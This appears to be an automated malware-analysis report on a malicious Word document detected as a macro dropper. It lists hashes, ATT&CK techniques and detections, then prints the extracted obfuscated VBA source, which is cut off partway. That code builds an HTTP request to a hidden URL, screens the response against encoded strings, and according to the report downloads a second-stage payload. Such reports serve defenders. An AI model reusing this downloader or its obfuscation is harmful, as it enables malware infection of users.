Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e42fdad4f0754a25…

MALICIOUS

Office (OLE)

86.5 KB Created: 2016-10-10 20:51:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 6dc2d48e7616adf49aa71f4807911bca SHA-1: e7e8748608deade7ccb96ae07e022a5741533a99 SHA-256: e42fdad4f0754a25657810dd5ae4626819815353142cb0de14dc38e21e15180b
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that use the Shell() function to execute commands and CreateObject to interact with system components. The document explicitly prompts the user to enable macros, indicating a lure to bypass security. The VBA script attempts to download a second-stage payload from a constructed URL, which is a common dropper behavior.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-1848766 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1848766
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6073 bytes
SHA-256: 6555c3f803f619be22f217b84c244cbfa782e868688d654a35f5866610209f35
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim vGfGTZ As Boolean
Public Sub zACPgx()
If vGfGTZ Then Exit Sub
vGfGTZ = True
CaOXz
End Sub
Public Sub Kophy_Painted(ByVal rgASQ As Long, ByVal cEwMEHX As IInkRectangle)
zACPgx
End Sub
Public Sub qRxCP()
DJnlpDa = hfaTr
If Not JJyTw(DJnlpDa, a("jDNCDwAAOMNIEV", 51, 106)) Then Error 205
If ICdZB(DJnlpDa, ZeHTx) Then Error 206
End Sub
Private Function hfaTr() As String
Set LnTCqYF = CreateObject(QlYWRXx)
LnTCqYF.Open uKFlrR, xUAdmLc, mmAoEO
LnTCqYF.SetRequestHeader a("XUgssehenMrtA-MRA", 88, 137), a("6Nwn .EMeipc0/loRO)5ni .TsdW0 S;bao 4lzeQp.tdT0  oi;7I ltm(.aiMLV0/er;", 163, 622)
LnTCqYF.SetRequestHeader nnDCn, uvpcMrU
LnTCqYF.Send
If 200 = LnTCqYF.Status Then
hfaTr = LnTCqYF.ResponseText
End If
End Function
Private Function QlYWRXx() As String
QlYWRXx = a("nuiqWeVRnpItWtwHKnQi1W..5p.tttsHe", 64, 70)
End Function
Private Function nnDCn() As String
nnDCn = a("eRIrEgeElfwreE", 95, 15)
End Function
Private Function uvpcMrU() As String
uvpcMrU = a("staeyspxn-Dsm/ia:ilpJ/no-W/dcafw.adSwctdXwoerh.m-etm/m", 437, 531)
End Function
Private Function xUAdmLc() As String
xUAdmLc = a("m/eo.Cvmh/.sy/wSimS2itcc:/gwopaC.ntio/mewQ/xi1dpt", 160, 449)
End Function
Private Function ZeHTx()
ZeHTx = Array(a("OEOJlNksTcEhi", 93, 124), a("cRArkratbpHoDKiOSCELUimo", 203, 224), a("cNQjmrwRDePiEpo Ta", 133, 196), a("rwEGTErCkaTk MdnIa", 49, 32), a("ocsicCBToEnq", 23, 28), _
a("wsrWrCTeJErHV", 112, 92), a("MeAIWscmoteKmsm", 26, 52), a("DMmDGEiiEINUAnC", 37, 106), a(" rkUTPoTEuOnIpGR", 117, 76), a("CyOteniTRoflKJa", 29, 55), _
a("tnecAtaDMmHNkKkre", 67, 109), a("AltSuutVhwBSUreF", 39, 22), a("uFlRpDVOhCju", 41, 57), a("TrGsLeoWfocNUEGHGSuiN tKeo", 265, 251), a("ZAMAqtOkuDENO", 142, 16), _
a("oyEMULaTIpSohtj", 29, 72), a("uIeXcGotAoTbCLy", 92, 131), a("aCMkQAixvDcraej", 139, 162), a("tDWishnCogfSeZ", 45, 19), a("HHAgUO svoVshx", 61, 117), _
a("PLd KLVOAdOkAwtp", 169, 111), a("DIcrcxuAdmteJEdb", 83, 88), a("QTemdNGaTQTRwaEmc", 173, 55), a("ZODRtpnXiUoppCfUo", 168, 56), a("CNJRziCBzsEefY", 19, 65), _
a("makoNeUOisNFTYgA", 131, 81), a("rwkreiZwEeFkay", 93, 38), a("qkVZXsKROwtenEsidARAPGy", 229, 135), a("BveEGBaIHlSTSgmYas", 133, 104), a("CxLAeEkhnlEswBe", 53, 47), _
a("mrlVCubGagxVTT", 53, 45), a("RjtOTnSmQOIefCrt", 35, 71), a("iePkmecAPsKCArrh", 95, 77), a("UealPtNaoeSsVRm", 109, 132), a("ERATIwZGhNWHeW", 45, 123), _
a("ipREyCwrmoTFNiilo", 168, 79), a("kMuCTYzl apvbEOj", 91, 76), a("SEXzlAoCwRUnan", 39, 153), a("sXEZXlJpAjHcar", 67, 101), a("NscqEYsiIkURYiVTe", 143, 146), _
a("kNrGUTNOzdMvAcEep", 55, 105), a("OrewPIntNfhRorF", 26, 110), a("eFkMoMERVIcNl", 133, 102), a("bdMOs,eeyIeLP tsQ", 25, 126), a("RMevcJCdrYIoinTKR", 181, 133), _
a("tyOSyoafrAM", 35, 105), a(".sLHEhIDIhCpKEEHS", 61, 168), a("JfkKDEtSOHeRO", 51, 35), a("cUKIegArSnyuuOt", 131, 23), a("aSddgBfRvTNbGEEXiE", 155, 23))
End Function
Private Function mmAoEO() As Boolean
mmAoEO = False
End Function
Private Function uKFlrR() As String
uKFlrR = a("bZTEGgtlxV", 109, 64)
End Function
Private Function JJyTw(ByVal DjMwzb As String, ByVal anhioZg As String) As Boolean
qJIIXIK = InStrRev(nmiKPTL(DjMwzb), nmiKPTL(anhioZg))
JJyTw = qJIIXIK <> ysVlbdd
End Function
Private Function ysVlbdd() As Integer
ysVlbdd = 0
End Function
Private Function nmiKPTL(ByVal qgAhsjZ As String) As String
nmiKPTL = LCase(qgAhsjZ)
End Function
Private Function ICdZB(ByVal DjMwzb As String, ByVal BQKxeU) As Boolean
For Each anhioZg In BQKxeU
If JJyTw(DjMwzb, anhioZg) Then GoTo yEPjK
Next
Exit Function
yEPjK:
ICdZB = True
End Function
Private Function nFzRRtI(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
nFzRRtI = aOJBu(iEgcz(qgAhsjZ, qJIIXIK), 1)
End Function
Private Function aOJBu(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
aOJBu = Rig
... (truncated)